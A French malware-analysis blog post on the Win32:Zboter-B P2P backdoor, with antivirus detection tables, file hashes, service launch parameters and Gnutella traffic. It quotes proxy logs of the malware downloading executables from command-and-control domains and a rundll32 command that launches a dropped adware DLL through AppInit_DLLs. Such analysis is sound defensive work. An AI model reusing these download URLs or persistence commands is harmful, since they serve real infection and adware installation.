Win32:Zboter-B : Backdoor P2P

Petite récupération d’une Backdoor via un sujet sur un forum : http://www.virustotal.com/file-scan/report.html?id=e86220cb5aea573766da85b0c43b220bb7abc8a7d42b9033c8169d2e0558677c-1302351941

La détection est relativement bonne :

File name: dbgdev40.exe
Submission date: 2011-04-09 12:25:41 (UTC)
Current status: finished
Result: 17/ 41 (41.5%) 

Print results
Antivirus     Version     Last Update     Result
AhnLab-V3    2011.04.09.00    2011.04.08    Malware/Win32.Generic
AntiVir    7.11.6.19    2011.04.08    TR/Crypt.EPACK.Gen2
Antiy-AVL    2.0.3.7    2011.04.09    –
Avast    4.8.1351.0    2011.04.09    Win32:Zboter-B
Avast5    5.0.677.0    2011.04.09    Win32:Zboter-B
AVG    10.0.0.1190    2011.04.09    SHeur3.BUCT
BitDefender    7.2    2011.04.09    Gen:Variant.Kazy.17580
CAT-QuickHeal    11.00    2011.04.09    (Suspicious) – DNAScan
ClamAV    0.97.0.0    2011.04.09    –
Commtouch    5.2.11.5    2011.04.06    –
Comodo    8279    2011.04.09    TrojWare.Win32.Kryptik.LNM
DrWeb    5.0.2.03300    2011.04.09    Trojan.DownLoader2.29693
eSafe    7.0.17.0    2011.04.07    –
eTrust-Vet    36.1.8261    2011.04.08    –
F-Prot    4.6.2.117    2011.04.09    –
F-Secure    9.0.16440.0    2011.04.09    Gen:Variant.Kazy.17580
Fortinet    4.2.254.0    2011.04.09    –
GData    22    2011.04.09    Gen:Variant.Kazy.17580
Ikarus    T3.1.1.103.0    2011.04.09    Gen.Variant.Kazy
Jiangmin    13.0.900    2011.04.09    –
K7AntiVirus    9.96.4347    2011.04.09    –
Kaspersky    7.0.0.125    2011.04.09    –
McAfee    5.400.0.1158    2011.04.09    Artemis!8E732E6442B5
McAfee-GW-Edition    2010.1C    2011.04.09    Artemis!8E732E6442B5
Microsoft    1.6702    2011.04.09    –
NOD32    6028    2011.04.09    –
Norman    6.07.07    2011.04.09    –
Panda    10.0.3.5    2011.04.09    Suspicious file
PCTools    7.0.3.5    2011.04.07    –
Prevx    3.0    2011.04.09    –
Rising    23.52.05.05    2011.04.09    –
Sophos    4.64.0    2011.04.09    Mal/Generic-L
SUPERAntiSpyware    4.40.0.1006    2011.04.07    –
Symantec    20101.3.2.89    2011.04.09    –
TheHacker    6.7.0.1.170    2011.04.09    –
TrendMicro    9.200.0.1012    2011.04.09    –
TrendMicro-HouseCall    9.200.0.1012    2011.04.09    –
VBA32    3.12.14.3    2011.04.08    –
VIPRE    8966    2011.04.09    Trojan.Win32.Generic!BT
ViRobot    2011.4.9.4402    2011.04.09    –
VirusBuster    13.6.295.0    2011.04.08    –
Additional information
MD5   : 8e732e6442b5e377967d67cb9a394fae
SHA1  : d50ff2aeec46783744b987b59ba30768bbcf2dd7
SHA256: e86220cb5aea573766da85b0c43b220bb7abc8a7d42b9033c8169d2e0558677c

La détection Win32:Zboter-A chez Avast! a été ajouté le 9 Janvier.
Il semble que le malware soit détecté en Trojan-Zbot mais les caractéristiques de ce dernier ne correspondant pas vraiment.

Ce dernier est lancé par un service, HijackThis n’affiche pas le service (peut-être dû à la whitelist sur Microsoft Corporation) – OTL le montre sans souci :
SRV – [2011/04/09 15:16:33 | 000,564,736 | —- | M] (Microsoft Corporation) [Auto | Running] — C:\WINDOWS\System32\syshelp.exe — (syshelp.exe)

Le malware est lancé avec les paramètres suivants où /p doit être le port de communication :

“C:\WINDOWS\system32\syshelp.exe” /s /p 27016

Ce dernier embarque le protocole de communication Gnutella :

Backdoor Win:32Zboter : Backdor P2P
Backdoor Win:32Zboter : Backdor P2P

On peux d’ailleurs voir les communications avec les peers :

Backdoor Win:32Zboter : Backdor P2P
Ceci n’a rien à voir avec les mécanismes de Trojan-Zbot
Le malware se connecte aux adresses suivants pour récupérer en autre les dernières versions disponibles :
1302353051.696     79 192.168.1.27 TCP_MISS/200 272 GET http://victsecrets.com/fork/ipinfo?v=2.6c&c=NqCgIru%2frq1xGol5BmqhDQ%2f%2bbwEw9EU%2fNonsRhSbEgCYe9at76StSX1ZTyXNAOoiV%2fLsYlCK%2b4gUr7NlOYSp2zMGCMpxrz4LYB8UXfDWDRy%2f8I6LBA1XUgo%2bndJAknWAMcyotiZuGwceYIa8bndlzsNgXIYN38Ty&p=Ntc%3d – DIRECT/95.142.100.56 –
1302353051.783     82 192.168.1.27 TCP_MISS/200 248 GET http://victsecrets.com/fork/update?v=2.6c&c=NqCgIru%2frq1xGol5BmqhDQ%2f%2bbwEw9EU%2fNonsRhSbEgCYe9at76StSX1ZTyXNAOoiV%2fLsYlCK%2b4gUr7NlOYSp2zMGCMpxrz4LYB8UXfDWDRy%2f8I6LBA1XUgo%2bndJAknWAMcyotiZuGwceepmYVWU0g9BySJMX3%2bKFt8XcpTHja07rYbrNPTM%3d&p=NqCgIqm1uOYhVNp5FWK0RCfbbCpx%2bEI%2ffd2%2fCVjRdWKWHqG31e%2flW1wFbAHaYpEzVOekWWnu0aJAiOkyEcb%2bhGNYQqQm%2bgwodwdvOIHPRlPw4a%2b4UScXZxkm5Lc1nFODMcyxr2clTUIeYpCWVnkMpOhiD8hGieyvhMeJ6hnKWEysS4qOaC2REiMsZ%2fBAo%2bemCGIBkQfInA%2fE7uBHHnu14mhxnzinXBd0wUZHkl59U5lgRscpIq%2bbrvpXoF0j5QTqSjp7wpQC0RgaPgXzsOYjwi6GrrFN6Dt0Ve5PMdn%2bB69EV1zjBtU1UvNzaWUs5KI8OG9%2f31Hkn2cqciZqTMXCt0mC – DIRECT/95.142.100.56 –
Une recherche sur le domaine victsecrets.com montre que ce dernier est déjà connu – en autre par malware-control.com :
http://www.malware-control.com/statics-pages/7f3ede16168a5900a3612f11634f49d3.php
http://www.malware-control.com/statics-pages/9a19dc61ecf4f55e620f96300f8979ec.php
http://www.malware-control.com/statics-pages/2cb038bdaac54a51d398efb570024aff.php
Si une version plus récente est disponible, le malware se connecte sur flickr pour récupérer l’adresse de la dernière version dispnible :
1302352365.012     98 192.168.1.27 TCP_MISS/200 317 POST http://try2findall.com:8080/flickr/ini/?a=3252&c= – DIRECT/95.142.100.26 text/html
1302352365.283     78 192.168.1.27 TCP_MISS/200 317 POST http://try2findall.com:8080/flickr/ini/?a=3252&c= – DIRECT/95.142.100.26 text/html
1302352471.181     83 192.168.1.27 TCP_MISS/200 1091 GET http://try2findall.com:8080/flickr/?a=3252&c= – DIRECT/95.142.100.26 text/html
Backdoor Win:32Zboter : Backdoor P2P
Ce dernier télécharge alors une mise à jour :
1302352471.485    103 192.168.1.27 TCP_MISS/302 398 GET http://updatedfiles.com/myspace/?f=4&a=3252 – DIRECT/89.149.242.216 text/html
1302352473.432   1946 192.168.1.27 TCP_MISS/200 579472 GET http://updatedfiles.com/myspace/out/3252/x3252.exe – DIRECT/89.149.242.216 application/octet-stream
1302352490.353   2659 192.168.1.27 TCP_MISS/200 2873487 GET http://updatenetworking.com/nyt2/m7-401.zip?a=3252&c= – DIRECT/91.224.160.32 application/zip

Ce dernier droppe une DLL qui se lance via la clef AppInit_DLLS :

O20 – AppInit_DLLs: mmcperf.dll

qui lance rundll32 avec les paramètres suivants :

rundll32 “C:\WINDOWS\system32\mmcperf.dll”,popup http://winstat32x.com/url/in.cgi?69EB4EE60BA0D0AE5BA109B20FFE5C96E266709154AF58AEC5AFF3DE0D4F18CED NULL FALSE NULL NULL NULL NULL NULL NULL NULL NULL NULL

Possible Trojan-Vundo.

La détection :

File name: x3252.exe
Submission date: 2011-04-09 12:30:55 (UTC)
Current status: finished
Result: 10 /42 (23.8%)
Antivirus     Version     Last Update     Result
AhnLab-V3     2011.04.09.00     2011.04.08     –
AntiVir     7.11.6.19     2011.04.08     TR/Crypt.EPACK.Gen2
Antiy-AVL     2.0.3.7     2011.04.09     –
Avast     4.8.1351.0     2011.04.09     Win32:Zboter-B
Avast5     5.0.677.0     2011.04.09     Win32:Zboter-B
AVG     10.0.0.1190     2011.04.09     –
BitDefender     7.2     2011.04.09     Gen:Variant.Kazy.17580
CAT-QuickHeal     11.00     2011.04.09     (Suspicious) – DNAScan
ClamAV     0.97.0.0     2011.04.09     –
Commtouch     5.2.11.5     2011.04.06     –
Comodo     8279     2011.04.09     TrojWare.Win32.Kryptik.LNM
DrWeb     5.0.2.03300     2011.04.09     –
Emsisoft     5.1.0.5     2011.04.09     –
eSafe     7.0.17.0     2011.04.07     –
eTrust-Vet     36.1.8261     2011.04.08     –
F-Prot     4.6.2.117     2011.04.09     –
F-Secure     9.0.16440.0     2011.04.09     Gen:Variant.Kazy.17580
Fortinet     4.2.254.0     2011.04.09     –
GData     22     2011.04.09     Gen:Variant.Kazy.17580
Ikarus     T3.1.1.103.0     2011.04.09     –
Jiangmin     13.0.900     2011.04.09     –
K7AntiVirus     9.96.4347     2011.04.09     –
Kaspersky     7.0.0.125     2011.04.09     –
McAfee     5.400.0.1158     2011.04.09     –
McAfee-GW-Edition     2010.1C     2011.04.09     –
Microsoft     1.6702     2011.04.09     –
NOD32     6028     2011.04.09     –
Norman     6.07.07     2011.04.09     –
Panda     10.0.3.5     2011.04.09     Suspicious file
PCTools     7.0.3.5     2011.04.07     –
Prevx     3.0     2011.04.09     –
Rising     23.52.05.05     2011.04.09     –
Sophos     4.64.0     2011.04.09     Mal/Swizzor-D
SUPERAntiSpyware     4.40.0.1006     2011.04.07     –
Symantec     20101.3.2.89     2011.04.09     –
TheHacker     6.7.0.1.170     2011.04.09     –
TrendMicro     9.200.0.1012     2011.04.09     –
TrendMicro-HouseCall     9.200.0.1012     2011.04.09     –
VBA32     3.12.14.3     2011.04.08     –
VIPRE     8966     2011.04.09     –
ViRobot     2011.4.9.4402     2011.04.09     –
VirusBuster     13.6.295.0     2011.04.08     –
Additional information
MD5   : 6b6f648387ec18e38b269f449b78f091
SHA1  : 2484f41d37aeb1ff03809debfd2ef80cdb80fa6e
SHA256: 506c32f3dc30ac71bc648caf896027716e4b34d995231081bfe333b2e9c753ca

Bref une backdoor qui permet le contrôle de l’ordinateur et installe un adware pour monétiser.

Trouver la solution sur le forum d'aide

Vous êtes arrivé au terme de l'article Win32:Zboter-B : Backdoor P2P mais vous n'avez pas trouvé la solution à votre problème...
Suivez ces articles du forum pour trouver une réponse ou demandez à votre tour de l'aide sur le forum


Vous avez trouvé cet article utile et interressant, n'hésitez pas à le partager...
Une question informatique ?
Un virus à supprimer ? Votre PC est lent ?
Demander de l'aide sur le forum

Laisser un commentaire

0 Partages
Tweetez
Partagez
Enregistrer
Partagez